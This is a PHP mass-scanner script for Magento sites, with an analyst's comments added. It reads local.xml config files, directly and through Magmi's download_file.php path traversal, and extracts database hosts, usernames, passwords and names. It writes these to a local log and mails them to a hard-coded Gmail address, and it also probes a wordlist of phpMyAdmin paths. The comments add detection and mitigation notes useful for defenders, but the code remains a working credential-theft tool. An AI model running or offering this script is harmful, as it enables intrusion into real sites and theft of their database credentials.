- <form method='post'>
- <textarea name='sites' style="height:250px;width:500px" placeholder="http://www.target.com/ | scan without http/https" ></textarea><br><br>
- <input type='submit' name='go' value='GASCOK'>
- <input type="reset" value="CANCEL">
- </form>
- </div>
- </center>
- <?php
- // Analyst notes: helper functions of a form-driven scanner. The script requests URLs on
- // operator-supplied hosts, reads a leaked application config file, and probes a fixed list of
- // database admin panel paths.
- // Errors are silenced and the execution time limit is removed.
- error_reporting(0);
- set_time_limit(0);
- // get_content: fetches $bda with file_get_contents(); the @ suppresses warnings, so a failed
- // fetch yields false instead of an error.
- function get_content($bda){
- return @file_get_contents($bda);
- // GetStr (defined on the next line): returns the text that follows the first occurrence of
- // $start in $string, cut at the first occurrence of $end.
- } function GetStr($start,$end,$string){
- $a = explode($start,$string);
- $b = explode($end,$a[1]);
- return $b[0];
- // FinderPhpMyAdmin (defined on the next line): requests each path in $list on $site and returns
- // at the first response containing "200 OK" or "401 Unauthorized". If nothing matches, the
- // function falls through without a return value.
- // Detection: one client requesting these directory names in sequence, mostly answered with 404.
- // No User-Agent option is set on the cURL handle below.
- // Mitigation: keep database admin panels off predictable public paths and restrict them by
- // network or authentication.
- } function FinderPhpMyAdmin($site) {
- $x = 1;
- // Wordlist of common and versioned phpMyAdmin / SQL admin directory names.
- $list = array(
- '/phpMyAdmin/',
- '/phpmyadmin/',
- '/PMA/',
- '/pma/',
- '/dbadmin/',
- '/mysql/',
- '/myadmin/',
- '/phpmyadmin2/',
- '/phpMyAdmin2/',
- '/phpMyAdmin-2/',
- '/php-my-admin/',
- '/phpMyAdmin-2.2.3/',
- '/phpMyAdmin-2.2.6/',
- '/phpMyAdmin-2.5.1/',
- '/phpMyAdmin-2.5.4/',
- '/phpMyAdmin-2.5.5-rc1/',
- '/phpMyAdmin-2.5.5-rc2/',
- '/phpMyAdmin-2.5.5/',
- '/phpMyAdmin-2.5.5-pl1/',
- '/phpMyAdmin-2.5.6-rc1/',
- '/phpMyAdmin-2.5.6-rc2/',
- '/phpMyAdmin-2.5.6/',
- '/phpMyAdmin-2.5.7/',
- '/phpMyAdmin-2.5.7-pl1/',
- '/phpMyAdmin-2.6.0-alpha/',
- '/phpMyAdmin-2.6.0-alpha2/',
- '/phpMyAdmin-2.6.0-beta1/',
- '/phpMyAdmin-2.6.0-beta2/',
- '/phpMyAdmin-2.6.0-rc1/',
- '/phpMyAdmin-2.6.0-rc2/',
- '/phpMyAdmin-2.6.0-rc3/',
- '/phpMyAdmin-2.6.0/',
- '/phpMyAdmin-2.6.0-pl1/',
- '/phpMyAdmin-2.6.0-pl2/',
- '/phpMyAdmin-2.6.0-pl3/',
- '/phpMyAdmin-2.6.1-rc1/',
- '/phpMyAdmin-2.6.1-rc2/',
- '/phpMyAdmin-2.6.1/',
- '/phpMyAdmin-2.6.1-pl1/',
- '/phpMyAdmin-2.6.1-pl2/',
- '/phpMyAdmin-2.6.1-pl3/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2-beta1/',
- '/phpMyAdmin-2.6.2-rc1/',
- '/phpMyAdmin-2.6.2/',
- '/phpMyAdmin-2.6.2-pl1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-rc1/',
- '/phpMyAdmin-2.6.3/',
- '/phpMyAdmin-2.6.3-pl1/',
- '/phpMyAdmin-2.6.4-rc1/',
- '/phpMyAdmin-2.6.4-pl1/',
- '/phpMyAdmin-2.6.4-pl2/',
- '/phpMyAdmin-2.6.4-pl3/',
- '/phpMyAdmin-2.6.4-pl4/',
- '/phpMyAdmin-2.6.4/',
- '/phpMyAdmin-2.7.0-beta1/',
- '/phpMyAdmin-2.7.0-rc1/',
- '/phpMyAdmin-2.7.0-pl1/',
- '/phpMyAdmin-2.7.0-pl2/',
- '/phpMyAdmin-2.7.0/',
- '/phpMyAdmin-2.8.0-beta1/',
- '/phpMyAdmin-2.8.0-rc1/',
- '/phpMyAdmin-2.8.0-rc2/',
- '/phpMyAdmin-2.8.0/',
- '/phpMyAdmin-2.8.0.1/',
- '/phpMyAdmin-2.8.0.2/',
- '/phpMyAdmin-2.8.0.3/',
- '/phpMyAdmin-2.8.0.4/',
- '/phpMyAdmin-2.8.1-rc1/',
- '/phpMyAdmin-2.8.1/',
- '/phpMyAdmin-2.8.2/',
- '/sqlmanager/',
- '/mysqlmanager/',
- '/p/m/a/',
- '/PMA2005/',
- '/pma2005/',
- '/phpmanager/',
- '/php-myadmin/',
- '/phpmy-admin/',
- '/webadmin/',
- '/sqlweb/',
- '/websql/',
- '/webdb/',
- '/mysqladmin/',
- '/mysql-admin/',
- '/mya/',
- );
- $jumlah = count($list);
- if(isset($site))
- {
- foreach($list as $path => $test)
- {
- // One request per candidate path. CURLOPT_HEADER=1 puts the response headers into $result,
- // which is how the status text is matched below.
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_URL, $site.$test);
- $result = curl_exec($ch);
- curl_close($ch);
- // The match is a plain substring test over headers and body, not a parsed status code.
- if (preg_match("/200 OK/", $result)) {
- return $bda.$test;
- break;
- } if (preg_match("/401 Unauthorized/", $result)){
- return $site.$test;
- } else {
- echo "";
- }
- }
- }
- }
- // Analyst notes: main flow of the scanner. It reads the posted form, requests a configuration
- // file from the submitted host, extracts database connection details from the response, then
- // records them locally and mails them to a hard-coded recipient.
- // Mitigation for site owners: deny web access to app/etc/ at the web server, remove Magmi from
- // production web roots or place it behind authentication, and rotate database credentials if
- // either URL below ever returned the file.
- error_reporting(0);
- set_time_limit(0);
- // 'go' is the submit button and 'sites' is the textarea of the form above.
- $ya=$_POST['go'];
- $co=$_POST['sites'];
- if($ya){
- // Split the textarea on CRLF into one host per entry.
- $e=explode("\r\n",$co);
- foreach($e as $bda){
- // Two URL suffixes that can expose the same config file: served directly by the web server, or
- // read through Magmi's download_file.php using a relative path.
- // Detection: GET requests for either suffix in access logs.
- $path = array("Amasty" => "/app/etc/local.xml","Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml");
- echo"<hr color=green>";
- echo "[+] Scanning $bda </font> ";
- foreach($path as $key)
- {
- // Plain http:// is always prepended. No stream context is passed, so no User-Agent is set here.
- $http='http://';
- $dn=($http).($bda).($key);
- $lfd=@file_get_contents($dn);
- // Treat the response as the config file when it contains the "<host><!" marker.
- if(preg_match("/<host><!/",$lfd))
- { echo"<br>";
- // Pull the database connection fields out of their CDATA sections.
- $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
- $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
- $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
- $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
- $lfdconfig .= "[+] Exploiting...Succes!!</font><br>";
- $lfdconfig = "[+] Host : $host</font><br>";
- $lfdconfig .= "[+] Username : $username</font><br>";
- $lfdconfig .= "[+] Password : $password</font><br>";
- $lfdconfig .= "[+] DatabaseName : $dbname</font><br>";
- echo $lfdconfig;
- //logger
- // Appends the harvested values in cleartext to res_xml.php in the script's working directory.
- // For incident response, a file with this name and these banner strings on a web host
- // indicates the script was run from there.
- $fp = fopen("res_xml.php", 'a');
- fwrite($fp, " ============== SETORAN LOG ==============<br>");
- fwrite($fp, " [+] Site : $bda <br>");
- fwrite($fp, " [+] Host : $host <br>");
- fwrite($fp, " [+] Username : $username <br>");
- fwrite($fp, " [+] Password : $password <br>");
- fwrite($fp, " [+] DBname : $dbname <br>");
- fwrite($fp, " [+] Login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </a><br>");
- fwrite($fp, " ============== RES7OCK CREW ==============<br><br>");
- fclose($fp);
- // Exfiltration: the same values are sent with mail() to the recipient hard-coded in $to.
- // Mail-side indicators are the "LFD | <site>" subject and the "LOGMAGENTO" From value.
- $to = "resultemail08@gmail.com";
- $subject = "LFD | $bda";
- $email = "LOGMAGENTO";
- $body=" Site : $bda \n Host : $host \n Username : $username \n Password :$password \n DBname : $dbname";
- $headers = 'From: ' .$email . "\n".
- 'X-Mailer: PHP/' . phpversion();
- if (mail($to,$subject,$body,$headers)) {
- echo("");
- }
- }
- }
- }
- // After the config-file checks, probe the host for a database admin panel and, when the call
- // returns a value, print it and mail it to the same recipient.
- $finderPhpmyadmin = FinderPhpMyAdmin("$bda");
- if(isset($finderPhpmyadmin)){
- echo " [+] Path Mysql login : <a href=$bda/$finderPhpmyadmin target=blank> $bda/$finderPhpmyadmin </font> </a>";
- $to = "resultemail08@gmail.com";
- $subject = "LFD | $bda";
- $email = "LOGMAGENTO";
- $body="Login : $bda/$finderPhpmyadmin";
- $headers = 'From: ' .$email . "\n".
- 'X-Mailer: PHP/' . phpversion();
- if (mail($to,$subject,$body,$headers)) {
- echo("");
- }
- echo"<hr color=green> ";
- } else {
- echo "[-] Path Mysql Not found";
- }
- break;
- }
- ?>